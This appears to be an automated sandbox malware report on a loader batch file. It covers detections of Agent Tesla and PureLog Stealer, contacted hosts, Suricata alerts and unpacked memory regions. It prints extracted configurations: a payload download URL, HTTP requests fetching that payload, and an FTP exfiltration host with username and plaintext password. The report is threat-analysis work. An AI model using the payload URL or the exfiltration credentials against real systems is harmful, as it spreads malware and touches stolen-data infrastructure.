Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
50.116.93.185	himalayastrek.com	United States	46606	UNIFIEDLAYER-AS-1US	true
110.4.45.197	ftp.haliza.com.my	Malaysia	46015	EXABYTES-AS-APExaBytesNetworkSdnBhdMY	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
himalayastrek.com	50.116.93.185	true
api.ipify.org	172.67.74.152	true
ftp.haliza.com.my	110.4.45.197	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	true	URL Reputation: safe	unknown
https://himalayastrek.com/origins/233_Cllyjbrxmng	true		unknown

AV Detection

Found malware configuration

Source: z1Transaction_ID_REF2418_cmd.bat	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: z1Transaction_ID_REF2418_cmd.bat

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack

Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	13_2_00401612

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49744 -> 110.4.45.197:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49747 -> 110.4.45.197:54601
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49753 -> 110.4.45.197:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49754 -> 110.4.45.197:63940

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://himalayastrek.com/origins/233_Cllyjbrxmng

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 110.4.45.197 ports 50707,62466,63940,62962,56275,55553,1,2,53369,54601,61195,21

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031DE4B8 InternetCheckConnectionA,

3_2_031DE4B8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 110.4.45.197:50707

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 110.4.45.197 110.4.45.197
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses FTP

Source: unknown

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: himalayastrek.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.haliza.com.my

Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
